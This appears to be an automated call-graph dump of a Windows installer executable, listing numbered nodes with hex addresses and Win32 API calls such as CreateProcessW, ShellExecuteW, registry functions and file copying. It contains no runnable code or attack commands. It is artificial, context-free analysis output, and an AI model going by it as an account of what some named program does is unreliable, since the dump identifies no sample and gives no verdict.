3085->3038 3089 405f17 3086->3089 3087 406162 3088 406178 3087->3088 3111 405ee8 lstrcpynW 3087->3111 3088->3043 3089->3087 3091 405fca GetVersion 3089->3091 3092 406130 lstrlenW 3089->3092 3095 405f0a 10 API calls 3089->3095 3097 406045 GetSystemDirectoryW 3089->3097 3098 406058 GetWindowsDirectoryW 3089->3098 3099 40617c 5 API calls 3089->3099 3100 40608c SHGetSpecialFolderLocation 3089->3100 3101 405f0a 10 API calls 3089->3101 3102 4060d1 lstrcatW 3089->3102 3104 405db5 RegOpenKeyExW 3089->3104 3109 405e2f wsprintfW 3089->3109 3110 405ee8 lstrcpynW 3089->3110 3091->3089 3092->3089 3095->3092 3097->3089 3098->3089 3099->3089 3100->3089 3103 4060a4 SHGetPathFromIDListW CoTaskMemFree 3100->3103 3101->3089 3102->3089 3103->3089 3105 405e29 3104->3105 3106 405de9 RegQueryValueExW 3104->3106 3105->3089 3107 405e0a RegCloseKey 3106->3107 3107->3105 3109->3089 3110->3089 3111->3088 3113 406279 GetProcAddress 3112->3113 3114 40626e LoadLibraryA 3112->3114 3115 405d89 3113->3115 3114->3113 3114->3115 3115->3056 3116 405c06 lstrcpyW 3115->3116 3117 405c55 GetShortPathNameW 3116->3117 3118 405c2f 3116->3118 3120 405c6a 3117->3120 3121 405d7c 3117->3121 3141 405b54 GetFileAttributesW CreateFileW 3118->3141 3120->3121 3123 405c72 wsprintfA 3120->3123 3121->3056 3122 405c39 CloseHandle GetShortPathNameW 3122->3121 3124 405c4d 3122->3124 3125 405f0a 18 API calls 3123->3125 3124->3117 3124->3121 3126 405c9a 3125->3126 3142 405b54 GetFileAttributesW CreateFileW 3126->3142 3128 405ca7 3128->3121 3129 405cb6 GetFileSize GlobalAlloc 3128->3129 3130 405d75 CloseHandle 3129->3130 3131 405cd8 3129->3131 3130->3121 3143 405bd7 ReadFile 3131->3143 3136 405cf7 lstrcpyA 3139 405d19 3136->3139 3137 405d0b 3138 405ab9 4 API calls 3137->3138 3138->3139 3140 405d50 SetFilePointer WriteFile GlobalFree 3139->3140 3140->3130 3141->3122 3142->3128 3144 405bf5 3143->3144 3144->3130 3145 405ab9 lstrlenA 3144->3145 3146 405afa lstrlenA 3145->3146 3147 405b02 3146->3147 3148 405ad3 lstrcmpiA 3146->3148 3147->3136 3147->3137 3148->3147 3149 405af1 CharNextA 3148->3149 3149->3146 3749 404241 lstrcpynW lstrlenW 3750 401d41 GetDC GetDeviceCaps 3751 402b1b 18 API calls 3750->3751 3752 401d5f MulDiv ReleaseDC 3751->3752 3753 402b1b 18 API calls 3752->3753 3754 401d7e 3753->3754 3755 405f0a 18 API calls 3754->3755 3756 401db7 CreateFontIndirectW 3755->3756 3757 4024e6 3756->3757 3758 401a42 3759 402b1b 18 API calls 3758->3759 3760 401a48 3759->3760 3761 402b1b 18 API calls 3760->3761 3762 4019f0 3761->3762 3763 402744 3764 40273f 3763->3764 3764->3763 3765 402754 FindNextFileW 3764->3765 3766 4027a6 3765->3766 3768 40275f 3765->3768 3769 405ee8 lstrcpynW 3766->3769 3769->3768 3777 401cc6 3778 402b1b 18 API calls 3777->3778 3779 401cd9 SetWindowLongW 3778->3779 3780 4029c5 3779->3780 3150 401dc7 3158 402b1b 3150->3158 3152 401dcd 3153 402b1b 18 API calls 3152->3153 3154 401dd6 3153->3154 3155 401de8 EnableWindow 3154->3155 3156 401ddd ShowWindow 3154->3156 3157 4029c5 3155->3157 3156->3157 3159 405f0a 18 API calls 3158->3159 3160 402b2f 3159->3160 3160->3152 3781 4045c8 3782 4045f4 3781->3782 3783 404605 3781->3783 3842 4056a8 GetDlgItemTextW 3782->3842 3785 404611 GetDlgItem 3783->3785 3792 404670 3783->3792 3789 404625 3785->3789 3786 4045ff 3788 40617c 5 API calls 3786->3788 3787 404754 3790 4048f5 3787->3790 3844 4056a8 GetDlgItemTextW 3787->3844 3788->3783 3793 404639 SetWindowTextW 3789->3793 3798 4059de 4 API calls 3789->3798 3797 404194 8 API calls 3790->3797 3792->3787 3792->3790 3795 405f0a 18 API calls 3792->3795 3796 40412d 19 API calls 3793->3796 3794 404784 3799 405a3b 18 API calls 3794->3799 3800 4046e4 SHBrowseForFolderW 3795->3800 3801 404655 3796->3801 3802 404909 3797->3802 3803 40462f 3798->3803 3804 40478a 3799->3804 3800->3787 3805 4046fc CoTaskMemFree 3800->3805 3806 40412d 19 API calls 3801->3806 3803->3793 3807 405933 3 API calls 3803->3807 3845 405ee8 lstrcpynW 3804->3845 3808 405933 3 API calls 3805->3808 3809 404663 3806->3809 3807->3793 3810 404709 3808->3810 3843 404162 SendMessageW 3809->3843 3813 404740 SetDlgItemTextW 3810->3813 3818 405f0a 18 API calls 3810->3818 3813->3787 3814 404669 3816 406252 3 API calls 3814->3816 3815 4047a1 3817 406252 3 API calls 3815->3817 3816->3792 3825 4047a9 3817->3825 3819 404728 lstrcmpiW 3818->3819 3819->3813 3822 404739 lstrcatW 3819->3822 3820 4047e8 3846 405ee8 lstrcpynW 3820->3846 3822->3813 3823 4047ef 3824 4059de 4 API calls 3823->3824 3826 4047f5 GetDiskFreeSpaceW 3824->3826 3825->3820 3828 40597f 2 API calls 3825->3828 3830 40483a 3825->3830 3829 404818 MulDiv 3826->3829 3826->3830 3828->3825 3829->3830 3831 4048a4 3830->3831 3847 404976 3830->3847 3833 4048c7 3831->3833 3835 40140b 2 API calls 3831->3835 3855 40414f KiUserCallbackDispatcher 3833->3855 3834 404896 3837 4048a6 SetDlgItemTextW 3834->3837 3838 40489b 3834->3838 3835->3833 3837->3831 3840 404976 21 API calls 3838->3840 3839 4048e3 3839->3790 3856 40455d 3839->3856 3840->3831 3842->3786 3843->3814 3844->3794 3845->3815 3846->3823 3848 404993 3847->3848 3849 405f0a 18 API calls 3848->3849 3850 4049c8 3849->3850 3851 405f0a 18 API calls 3850->3851 3852 4049d3 3851->3852 3853 405f0a 18 API calls 3852->3853 3854 404a04 lstrlenW wsprintfW SetDlgItemTextW 3853->3854 3854->3834 3855->3839 3857 404570 SendMessageW 3856->3857 3858 40456b 3856->3858 3857->3790 3858->3857 3859 4042ca 3861 4042e2 3859->3861 3864 4043fc 3859->3864 3860 404466 3862 404470 GetDlgItem 3860->3862 3863 404538 3860->3863 3865 40412d 19 API calls 3861->3865 3866 4044f9 3862->3866 3867 40448a 3862->3867 3870 404194 8 API calls 3863->3870 3864->3860 3864->3863 3868 404437 GetDlgItem SendMessageW 3864->3868 3869 404349 3865->3869 3866->3863 3874 40450b 3866->3874 3867->3866 3873 4044b0 6 API calls 3867->3873 3890 40414f KiUserCallbackDispatcher 3868->3890 3872 40412d 19 API calls 3869->3872 3881 404533 3870->3881 3876 404356 CheckDlgButton 3872->3876 3873->3866 3877 404521 3874->3877 3878 404511 SendMessageW 3874->3878 3875 404461 3879 40455d SendMessageW 3875->3879 3888 40414f KiUserCallbackDispatcher 3876->3888 3877->3881 3882 404527 SendMessageW 3877->3882 3878->3877 3879->3860 3882->3881 3883 404374 GetDlgItem 3889 404162 SendMessageW 3883->3889 3885 40438a SendMessageW 3886 4043b0 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 3885->3886 3887 4043a7 GetSysColor 3885->3887 3886->3881 3887->3886 3888->3883 3889->3885 3890->3875 3891 401bca 3892 402b1b 18 API calls 3891->3892 3893 401bd1 3892->3893 3894 402b1b 18 API calls 3893->3894 3895 401bdb 3894->3895 3896 401beb 3895->3896 3898 402b38 18 API calls 3895->3898 3897 401bfb 3896->3897 3899 402b38 18 API calls 3896->3899 3900 401c06 3897->3900 3901 401c4a 3897->3901 3898->3896 3899->3897 3902 402b1b 18 API calls 3900->3902 3903 402b38 18 API calls 3901->3903 3904 401c0b 3902->3904 3905 401c4f 3903->3905 3906 402b1b 18 API calls 3904->3906 3907 402b38 18 API calls 3905->3907 3908 401c14 3906->3908 3909 401c58 FindWindowExW 3907->3909 3910 401c3a SendMessageW 3908->3910 3911 401c1c SendMessageTimeoutW 3908->3911 3912 401c7a 3909->3912 3910->3912 3911->3912 3913 4024ca 3914 402b38 18 API calls 3913->3914 3915 4024d1 3914->3915 3918 405b54 GetFileAttributesW CreateFileW 3915->3918 3917 4024dd 3918->3917 3919 40194b 3920 402b1b 18 API calls 3919->3920 3921 401952 3920->3921 3922 402b1b 18 API calls 3921->3922 3923 40195c 3922->3923 3924 402b38 18 API calls 3923->3924 3925 401965 3924->3925 3926 401979 lstrlenW 3925->3926 3927 4019b5 3925->3927 3928 401983 3926->3928 3928->3927 3932 405ee8 lstrcpynW 3928->3932 3930 40199e 3930->3927 3931 4019ab lstrlenW 3930->3931 3931->3927 3932->3930 3936 4019cf 3937 402b38 18 API calls 3936->3937 3938 4019d6 3937->3938 3939 402b38 18 API calls 3938->3939 3940 4019df 3939->3940 3941 4019e6 lstrcmpiW 3940->3941 3942 4019f8 lstrcmpW 3940->3942 3943 4019ec 3941->3943 3942->3943 3274 401e51 3275 402b38 18 API calls 3274->3275 3276 401e57 3275->3276 3277 405192 25 API calls 3276->3277 3278 401e61 3277->3278 3292 405663 CreateProcessW 3278->3292 3281 401ec6 CloseHandle 3285 402791 3281->3285 3282 401e77 WaitForSingleObject 3283 401e89 3282->3283 3284 401e9b GetExitCodeProcess 3283->3284 3288 40628b 2 API calls 3283->3288 3286 401eba 3284->3286 3287 401ead 3284->3287 3286->3281 3290 401eb8 3286->3290 3295 405e2f wsprintfW 3287->3295 3291 401e90 WaitForSingleObject 3288->3291 3290->3281 3291->3283 3293 405692 CloseHandle 3292->3293 3294 401e67 3292->3294 3293->3294 3294->3281 3294->3282 3294->3285 3295->3290 3296 4052d1 3297 4052f2 GetDlgItem GetDlgItem GetDlgItem 3296->3297 3298 40547d 3296->3298 3341 404162 SendMessageW 3297->3341 3300 405486 GetDlgItem CreateThread CloseHandle 3298->3300 3301 4054ae 3298->3301 3300->3301 3364 405265 OleInitialize 3300->3364 3303 4054d9 3301->3303 3305 4054c5 ShowWindow ShowWindow 3301->3305 3306 4054fe 3301->3306 3302 405363 3310 40536a GetClientRect GetSystemMetrics SendMessageW SendMessageW 3302->3310 3304 405539 3303->3304 3307 405513 ShowWindow 3303->3307 3308 4054ed 3303->3308 3304->3306 3317 405547 SendMessageW 3304->3317 3346 404162 SendMessageW 3305->3346 3350 404194 3306->3350 3313 405533 3307->3313 3314 405525 3307->3314 3347 404106 3308->3347 3315 4053d9 3310->3315 3316 4053bd SendMessageW SendMessageW 3310->3316 3319 404106 SendMessageW 3313->3319 3318 405192 25 API calls 3314->3318 3320 4053ec 3315->3320 3321 4053de SendMessageW 3315->3321 3316->3315 3322 405560 CreatePopupMenu 3317->3322 3323 40550c 3317->3323 3318->3313 3319->3304 3342 40412d 3320->3342 3321->3320 3325 405f0a 18 API calls 3322->3325 3326 405570 AppendMenuW 3325->3326 3328 4055a0 TrackPopupMenu 3326->3328 3329 40558d GetWindowRect 3326->3329 3327 4053fc 3330 405405 ShowWindow 3327->3330 3331 405439 GetDlgItem SendMessageW 3327->3331 3328->3323 3332 4055bb 3328->3332 3329->3328 3333 405428 3330->3333 3334 40541b ShowWindow 3330->3334 3331->3323 3335 405460 SendMessageW SendMessageW 3331->3335 3336 4055d7 SendMessageW 3332->3336 3345 404162 SendMessageW 3333->3345 3334->3333 3335->3323 3336->3336 3337 4055f4 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3336->3337 3339 405619 SendMessageW 3337->3339 3339->3339 3340 405642 GlobalUnlock SetClipboardData CloseClipboard 3339->3340 3340->3323 3341->3302 3343 405f0a 18 API calls 3342->3343 3344 404138 SetDlgItemTextW 3343->3344 3344->3327 3345->3331 3346->3303 3348 404113 SendMessageW 3347->3348 3349 40410d 3347->3349 3348->3306 3349->3348 3351 404235 3350->3351 3352 4041ac GetWindowLongW 3350->3352 3351->3323 3352->3351 3353 4041bd 3352->3353 3354 4041cc GetSysColor 3353->3354 3355 4041cf 3353->3355 3354->3355 3356 4041d5 SetTextColor 3355->3356 3357 4041df SetBkMode 3355->3357 3356->3357 3358 4041f7 GetSysColor 3357->3358 3359 4041fd 3357->3359 3358->3359 3360 404204 SetBkColor 3359->3360 3361 40420e 3359->3361 3360->3361 3361->3351 3362 404221 DeleteObject 3361->3362 3363 404228 CreateBrushIndirect 3361->3363 3362->3363 3363->3351 3371 404179 3364->3371 3366 4052af 3367 404179 SendMessageW 3366->3367 3368 4052c1 CoUninitialize 3367->3368 3369 405288 3369->3366 3374 401389 3369->3374 3372 404191 3371->3372 3373 404182 SendMessageW 3371->3373 3372->3369 3373->3372 3375 401390 3374->3375 3376 4013fe 3375->3376 3377 4013cb MulDiv SendMessageW 3375->3377 3376->3369 3377->3375 3944 402251 3945 40225f 3944->3945 3946 402259 3944->3946 3948 40226d 3945->3948 3949 402b38 18 API calls 3945->3949 3947 402b38 18 API calls 3946->3947 3947->3945 3950 402b38 18 API calls 3948->3950 3952 40227b 3948->3952 3949->3948 3950->3952 3951 402b38 18 API calls 3953 402284 WritePrivateProfileStringW 3951->3953 3952->3951 3378 402452 3389 402c42 3378->3389 3380 40245c 3381 402b1b 18 API calls 3380->3381 3382 402465 3381->3382 3383 402470 3382->3383 3387 402791 3382->3387 3384 402489 RegEnumValueW 3383->3384 3385 40247d RegEnumKeyW 3383->3385 3386 4024a2 RegCloseKey 3384->3386 3384->3387 3385->3386 3386->3387 3390 402b38 18 API calls 3389->3390 3391 402c5b 3390->3391 3392 402c69 RegOpenKeyExW 3391->3392 3392->3380 3393 401752 3394 402b38 18 API calls 3393->3394 3395 401759 3394->3395 3396 401781 3395->3396 3397 401779 3395->3397 3433 405ee8 lstrcpynW 3396->3433 3432 405ee8 lstrcpynW 3397->3432 3400 40177f 3404 40617c 5 API calls 3400->3404 3401 40178c 3402 405933 3 API calls 3401->3402 3403 401792 lstrcatW 3402->3403 3403->3400 3429 40179e 3404->3429 3405 40622b 2 API calls 3405->3429 3406 405b2f 2 API calls 3406->3429 3408 4017b0 CompareFileTime 3408->3429 3409 401870 3411 405192 25 API calls 3409->3411 3410 401847 3412 405192 25 API calls 3410->3412 3421 40185c 3410->3421 3414 40187a 3411->3414 3412->3421 3413 405ee8 lstrcpynW 3413->3429 3415 403060 46 API calls 3414->3415 3416 40188d 3415->3416 3417 4018a1 SetFileTime 3416->3417 3418 4018b3 CloseHandle 3416->3418 3417->3418 3420 4018c4 3418->3420 3418->3421 3419 405f0a 18 API calls 3419->3429 3422 4018c9 3420->3422 3423 4018dc 3420->3423 3424 405f0a 18 API calls 3422->3424 3425 405f0a 18 API calls 3423->3425 3427 4018d1 lstrcatW 3424->3427 3428 4018e4 3425->3428 3427->3428 3430 4056c4 MessageBoxIndirectW 3428->3430 3429->3405 3429->3406 3429->3408 3429->3409 3429->3410 3429->3413 3429->3419 3431 405b54 GetFileAttributesW CreateFileW 3429->3431 3434 4056c4 3429->3434 3430->3421 3431->3429 3432->3400 3433->3401 3435 4056d9 3434->3435 3436 405725 3435->3436 3437 4056ed MessageBoxIndirectW 3435->3437 3436->3429 3437->3436 3438 4022d3 3439 402303 3438->3439 3440 4022d8 3438->3440 3441 402b38 18 API calls 3439->3441 3442 402c42 19 API calls 3440->3442 3445 40230a 3441->3445 3443 4022df 3442->3443 3444 4022e9 3443->3444 3446 402322 3443->3446 3447 402b38 18 API calls 3444->3447 3451 402b78 RegOpenKeyExW 3445->3451 3449 4022f0 RegDeleteValueW RegCloseKey 3447->3449 3449->3446 3453 402ba3 3451->3453 3458 402320 3451->3458 3452 402bc9 RegEnumKeyW 3452->3453 3454 402bdb RegCloseKey 3452->3454 3453->3452 3453->3454 3456 402c00 RegCloseKey 3453->3456 3459 402b78 3 API calls 3453->3459 3455 406252 3 API calls 3454->3455 3457 402beb 3455->3457 3456->3458 3457->3458 3460 402c1b RegDeleteKeyW 3457->3460 3458->3446 3459->3453 3460->3458 3954 401ed4 3955 402b38 18 API calls 3954->3955 3956 401edb 3955->3956 3957 40622b 2 API calls 3956->3957 3958 401ee1 3957->3958 3960 401ef2 3958->3960 3961 405e2f wsprintfW 3958->3961 3961->3960 3461 403c55 3462 403da8 3461->3462 3463 403c6d 3461->3463 3465 403df9 3462->3465 3466 403db9 GetDlgItem GetDlgItem 3462->3466 3463->3462 3464 403c79 3463->3464 3467 403c84 SetWindowPos 3464->3467 3468 403c97 3464->3468 3470 403e53 3465->3470 3479 401389 2 API calls 3465->3479 3469 40412d 19 API calls 3466->3469 3467->3468 3472 403cb4 3468->3472 3473 403c9c ShowWindow 3468->3473 3474 403de3 SetClassLongW 3469->3474 3471 404179 SendMessageW 3470->3471 3475 403da3 3470->3475 3502 403e65 3471->3502 3476 403cd6 3472->3476 3477 403cbc DestroyWindow 3472->3477 3473->3472 3478 40140b 2 API calls 3474->3478 3481 403cdb SetWindowLongW 3476->3481 3482 403cec 3476->3482 3480 4040b6 3477->3480 3478->3465 3483 403e2b 3479->3483 3480->3475 3490 4040e7 ShowWindow 3480->3490 3481->3475 3487 403d95 3482->3487 3488 403cf8 GetDlgItem 3482->3488 3483->3470 3484 403e2f SendMessageW 3483->3484 3484->3475 3485 40140b 2 API calls 3485->3502 3486 4040b8 DestroyWindow KiUserCallbackDispatcher 3486->3480 3489 404194 8 API calls 3487->3489 3491 403d28 3488->3491 3492 403d0b SendMessageW IsWindowEnabled 3488->3492 3489->3475 3490->3475 3494 403d35 3491->3494 3495 403d7c SendMessageW 3491->3495 3496 403d48 3491->3496 3505 403d2d 3491->3505 3492->3475 3492->3491 3493 405f0a 18 API calls 3493->3502 3494->3495 3494->3505 3495->3487 3499 403d50 3496->3499 3500 403d65 3496->3500 3497 404106 SendMessageW 3501 403d63 3497->3501 3498 40412d 19 API calls 3498->3502 3534 40140b 3499->3534 3504 40140b 2 API calls 3500->3504 3501->3487 3502->3475 3502->3485 3502->3486 3502->3493 3502->3498 3507 40412d 19 API calls 3502->3507 3522 403ff8 DestroyWindow 3502->3522 3506 403d6c 3504->3506 3505->3497 3506->3487 3506->3505 3508 403ee0 GetDlgItem 3507->3508 3509 403ef5 3508->3509 3510 403efd ShowWindow KiUserCallbackDispatcher 3508->3510 3509->3510 3531 40414f KiUserCallbackDispatcher 3510->3531 3512 403f27 EnableWindow 3515 403f3b 3512->3515 3513 403f40 GetSystemMenu EnableMenuItem SendMessageW 3514 403f70 SendMessageW 3513->3514 3513->3515 3514->3515 3515->3513 3532 404162 SendMessageW 3515->3532 3533 405ee8 lstrcpynW 3515->3533 3518 403f9e lstrlenW 3519 405f0a 18 API calls 3518->3519 3520 403fb4 SetWindowTextW 3519->3520 3521 401389 2 API calls 3520->3521 3521->3502 3522->3480 3523 404012 CreateDialogParamW 3522->3523 3523->3480 3524 404045 3523->3524 3525 40412d 19 API calls 3524->3525 3526 404050 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3525->3526 3527 401389 2 API calls 3526->3527 3528 404096 3527->3528 3528->3475 3529 40409e ShowWindow 3528->3529 3530 404179 SendMessageW 3529->3530 3530->3480 3531->3512 3532->3515 3533->3518 3535 401389 2 API calls 3534->3535 3536 401420 3535->3536 3536->3505 3962 4014d7 3963 402b1b 18 API calls 3962->3963 3964 4014dd Sleep 3963->3964 3966 4029c5 3964->3966 3537 403358 #17 SetErrorMode OleInitialize 3538 406252 3 API calls 3537->3538 3539 40339b SHGetFileInfoW 3538->3539 3610 405ee8 lstrcpynW 3539->3610 3541 4033c6 GetCommandLineW 3611 405ee8 lstrcpynW 3541->3611 3543 4033d8 GetModuleHandleW 3544 4033f0 3543->3544 3545 405960 CharNextW 3544->3545 3546 4033ff CharNextW 3545->3546 3548 40340f 3546->3548 3547 4034e4 3549 4034f8 GetTempPathW 3547->3549 3548->3547 3548->3548 3552 405960 CharNextW 3548->3552 3560 4034e6 3548->3560 3612 403324 3549->3612 3551 403510 3553 403514 GetWindowsDirectoryW lstrcatW 3551->3553 3554 40356a DeleteFileW 3551->3554 3552->3548 3555 403324 11 API calls 3553->3555 3620 402dba GetTickCount GetModuleFileNameW 3554->3620 3557 403530 3555->3557 3557->3554 3559 403534 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3557->3559 3558 40357e 3561 40361a ExitProcess CoUninitialize 3558->3561 3563 403606 3558->3563 3569 405960 CharNextW 3558->3569 3562 403324 11 API calls 3559->3562 3704 405ee8 lstrcpynW 3560->3704 3565 403725 3561->3565 3566 40362f 3561->3566 3567 403562 3562->3567 3650 4038b2 3563->3650 3568 4037a8 ExitProcess 3565->3568 3572 406252 3 API calls 3565->3572 3571 4056c4 MessageBoxIndirectW 3566->3571 3567->3554 3567->3561 3573 403599 3569->3573 3576 40363d ExitProcess 3571->3576 3577 403734 3572->3577 3578 4035e0 3573->3578 3579 403645 lstrcatW lstrcmpiW 3573->3579 3574 403616 3574->3561 3580 406252 3 API calls 3577->3580 3582 405a3b 18 API calls 3578->3582 3579->3561 3581 403661 CreateDirectoryW SetCurrentDirectoryW 3579->3581 3583 40373d 3580->3583 3584 403684 3581->3584 3585 403679 3581->3585 3586 4035ec 3582->3586 3587 406252 3 API calls 3583->3587 3708 405ee8 lstrcpynW 3584->3708 3707 405ee8 lstrcpynW 3585->3707 3586->3561 3705 405ee8 lstrcpynW 3586->3705 3590 403746 3587->3590 3592 403794 ExitWindowsEx 3590->3592 3595 403754 GetCurrentProcess 3590->3595 3592->3568 3594 4037a1 3592->3594 3593 4035fb 3706 405ee8 lstrcpynW 3593->3706 3598 40140b 2 API calls 3594->3598 3600 403764 3595->3600 3597 405f0a 18 API calls 3599 4036c3 DeleteFileW 3597->3599 3598->3568 3601 4036d0 CopyFileW 3599->3601 3607 403692 3599->3607 3600->3592 3601->3607 3602 403719 3603 405d82 40 API calls 3602->3603 3605 403720 3603->3605 3604 405d82 40 API calls 3604->3607 3605->3561 3606 405f0a 18 API calls 3606->3607 3607->3597 3607->3602 3607->3604 3607->3606 3608 405663 2 API calls 3607->3608 3609 403704 CloseHandle 3607->3609 3608->3607 3609->3607 3610->3541 3611->3543 3613 40617c 5 API calls 3612->3613 3614 403330 3613->3614 3615 40333a 3614->3615 3616 405933 3 API calls 3614->3616 3615->3551 3617 403342 CreateDirectoryW 3616->3617 3709 405b83 3617->3709 3713 405b54 GetFileAttributesW CreateFileW 3620->3713 3622 402dfd 3649 402e0a 3622->3649 3714 405ee8 lstrcpynW 3622->3714 3624 402e20 3625 40597f 2 API calls 3624->3625 3626 402e26 3625->3626 3715 405ee8 lstrcpynW 3626->3715 3628 402e31 GetFileSize 3629 402f32 3628->3629 3631 402e48 3628->3631 3630 402d18 33 API calls 3629->3630 3632 402f39 3630->3632 3631->3629 3633 4032f7 ReadFile 3631->3633 3634 402fcd 3631->3634 3642 402d18 33 API calls 3631->3642 3631->3649 3635 402f75 GlobalAlloc 3632->3635 3632->3649 3717 40330d SetFilePointer 3632->3717 3633->3631 3637 402d18 33 API calls 3634->3637 3636 402f8c 3635->3636 3640 405b83 2 API calls 3636->3640 3637->3649 3639 402f56 3641 4032f7 ReadFile 3639->3641 3643 402f9d CreateFileW 3640->3643 3644 402f61 3641->3644 3642->3631 3645 402fd7 3643->3645 3643->3649 3644->3635 3644->3649 3716 40330d SetFilePointer 3645->3716 3647 402fe5 3648 403060 46 API calls 3647->3648 3648->3649 3649->3558 3649->3649 3651 406252 3 API calls 3650->3651 3652 4038c6 3651->3652 3653 4038cc 3652->3653 3654 4038de 3652->3654 3727 405e2f wsprintfW 3653->3727 3655 405db5 3 API calls 3654->3655 3656 40390e 3655->3656 3657 40392d lstrcatW 3656->3657 3659 405db5 3 API calls 3656->3659 3660 4038dc 3657->3660 3659->3657 3718 403b88 3660->3718 3663 405a3b 18 API calls 3664 40395f 3663->3664 3665 4039f3 3664->3665 3667 405db5 3 API calls 3664->3667 3666 405a3b 18 API calls 3665->3666 3668 4039f9 3666->3668 3670 403991 3667->3670 3669 403a09 LoadImageW 3668->3669 3671 405f0a 18 API calls 3668->3671 3672 403a30 RegisterClassW 3669->3672 3673 403aaf 3669->3673 3670->3665 3674 4039b2 lstrlenW 3670->3674 3678 405960 CharNextW 3670->3678 3671->3669 3675 403a66 SystemParametersInfoW CreateWindowExW 3672->3675 3676 403ab9 3672->3676 3677 40140b 2 API calls 3673->3677 3679 4039c0 lstrcmpiW 3674->3679 3680 4039e6 3674->3680 3675->3673 3676->3574 3681 403ab5 3677->3681 3682 4039af 3678->3682 3679->3680 3683 4039d0 GetFileAttributesW 3679->3683 3684 405933 3 API calls 3680->3684 3681->3676 3686 403b88 19 API calls 3681->3686 3682->3674 3685 4039dc 3683->3685 3687 4039ec 3684->3687 3685->3680 3688 40597f 2 API calls 3685->3688 3689 403ac6 3686->3689 3728 405ee8 lstrcpynW 3687->3728 3688->3680 3691 403ad2 ShowWindow LoadLibraryW 3689->3691 3692 403b55 3689->3692 3694 403af1 LoadLibraryW 3691->3694 3695 403af8 GetClassInfoW 3691->3695 3693 405265 5 API calls 3692->3693 3696 403b5b 3693->3696 3694->3695 3697 403b22 DialogBoxParamW 3695->3697 3698 403b0c GetClassInfoW RegisterClassW 3695->3698 3700 403b77 3696->3700 3701 403b5f 3696->3701 3699 40140b 2 API calls 3697->3699 3698->3697 3699->3676 3702 40140b 2 API calls 3700->3702 3701->3676 3703 40140b 2 API calls 3701->3703 3702->3676 3703->3676 3704->3549 3705->3593 3706->3563 3707->3584 3708->3607 3710 405b90 GetTickCount GetTempFileNameW 3709->3710 3711 405bc6 3710->3711 3712 403356 3710->3712 3711->3710 3711->3712 3712->3551 3713->3622 3714->3624 3715->3628 3716->3647 3717->3639 3719 403b9c 3718->3719 3729 405e2f wsprintfW 3719->3729 3721 403c0d 3722 405f0a 18 API calls 3721->3722 3723 403c19 SetWindowTextW 3722->3723 3724 40393d 3723->3724 3725 403c35 3723->3725 3724->3663 3725->3724 3726 405f0a 18 API calls 3725->3726 3726->3725 3727->3660 3728->3665 3729->3721 3967 40155b 3968 40296b 3967->3968 3971 405e2f wsprintfW 3968->3971 3970 402970 3971->3970 3979 4023de 3980 402c42 19 API calls 3979->3980 3981 4023e8 3980->3981 3982 402b38 18 API calls 3981->3982 3983 4023f1 3982->3983 3984 4023fc RegQueryValueExW 3983->3984 3989 402791 3983->3989 3985 402422 RegCloseKey 3984->3985 3986 40241c 3984->3986 3985->3989 3986->3985 3990 405e2f wsprintfW 3986->3990 3990->3985 3991 401ce5 GetDlgItem GetClientRect 3992 402b38 18 API calls 3991->3992 3993 401d17 LoadImageW SendMessageW 3992->3993 3994 4029c5 3993->3994 3995 401d35 DeleteObject 3993->3995 3995->3994 3161 40206a 3177 402b38 3161->3177 3164 402b38 18 API calls 3165 40207b 3164->3165 3166 402b38 18 API calls 3165->3166 3167 402084 3166->3167 3168 402b38 18 API calls 3167->3168 3169 40208e 3168->3169 3170 402b38 18 API calls 3169->3170 3171 402098 3170->3171 3172 4020ac CoCreateInstance 3171->3172 3173 402b38 18 API calls 3171->3173 3176 4020cb 3172->3176 3173->3172 3175 402195 3176->3175 3183 401423 3176->3183 3178 402b44 3177->3178 3179 405f0a 18 API calls 3178->3179 3180 402b65 3179->3180 3181 402071 3180->3181 3182 40617c 5 API calls 3180->3182 3181->3164 3182->3181 3184 405192 25 API calls 3183->3184 3185 401431 3184->3185 3185->3175 3996 40156b 3997 401584 3996->3997 3998 40157b ShowWindow 3996->3998 3999 401592 ShowWindow 3997->3999 4000 4029c5 3997->4000 3998->3997 3999->4000 4001 4024ec 4002 4024f1 4001->4002 4003 40250a 4001->4003 4004 402b1b 18 API calls 4002->4004 4005 402510 4003->4005 4006 40253c 4003->4006 4011 4024f8 4004->4011 4008 402b38 18 API calls 4005->4008 4007 402b38 18 API calls 4006->4007 4009 402543 lstrlenW 4007->4009 4010 402517 WideCharToMultiByte lstrlenA 4008->4010 4009->4011 4010->4011 4012 402565 WriteFile 4011->4012 4013 402791 4011->4013 4012->4013 3186 40276e 3187 402b38 18 API calls 3186->3187 3188 402775 FindFirstFileW 3187->3188 3189 402788 3188->3189 3190 40279d 3188->3190 3191 4027a6 3190->3191 3194 405e2f wsprintfW 3190->3194 3195 405ee8 lstrcpynW 3191->3195 3194->3191 3195->3189 4014 4018ef 4015 401926 4014->4015 4016 402b38 18 API calls 4015->4016 4017 40192b 4016->4017 4018 405770 71 API calls 4017->4018 4019 401934 4018->4019 4020 403870 4021 40387b 4020->4021 4022 403882 GlobalAlloc 4021->4022 4023 40387f 4021->4023 4022->4023 4024 402571 4025 402b1b 18 API calls 4024->4025 4029 402580 4025->4029 4026 40269e 4027 4025c6 ReadFile 4027->4026 4027->4029 4028 405bd7 ReadFile 4028->4029 4029->4026 4029->4027 4029->4028 4030 4026a0 4029->4030 4031 402606 MultiByteToWideChar 4029->4031 4033 4026b1 4029->4033 4034 40262c SetFilePointer MultiByteToWideChar 4029->4034 4036 405e2f wsprintfW 4030->4036 4031->4029 4033->4026 4035 4026d2 SetFilePointer 4033->4035 4034->4029 4035->4026 4036->4026 4037 4014f1 SetForegroundWindow 4038 4029c5 4037->4038 4046 4018f2 4047 402b38 18 API calls 4046->4047 4048 4018f9 4047->4048 4049 4056c4 MessageBoxIndirectW 4048->4049 4050 401902 4049->4050 4058 401df3 4059 402b38 18 API calls 4058->4059 4060 401df9 4059->4060 4061 402b38 18 API calls 4060->4061 4062 401e02 4061->4062 4063 402b38 18 API calls 4062->4063 4064 401e0b 4063->4064 4065 402b38 18 API calls 4064->4065 4066 401e14 4065->4066 4067 401423 25 API calls 4066->4067 4068 401e1b ShellExecuteW 4067->4068 4069 401e4c 4068->4069 4075 4026f7 4076 4026fe 4075->4076 4078 402970 4075->4078 4077 402b1b 18 API calls 4076->4077 4079 402709 4077->4079 4080 402710 SetFilePointer 4079->4080 4080->4078 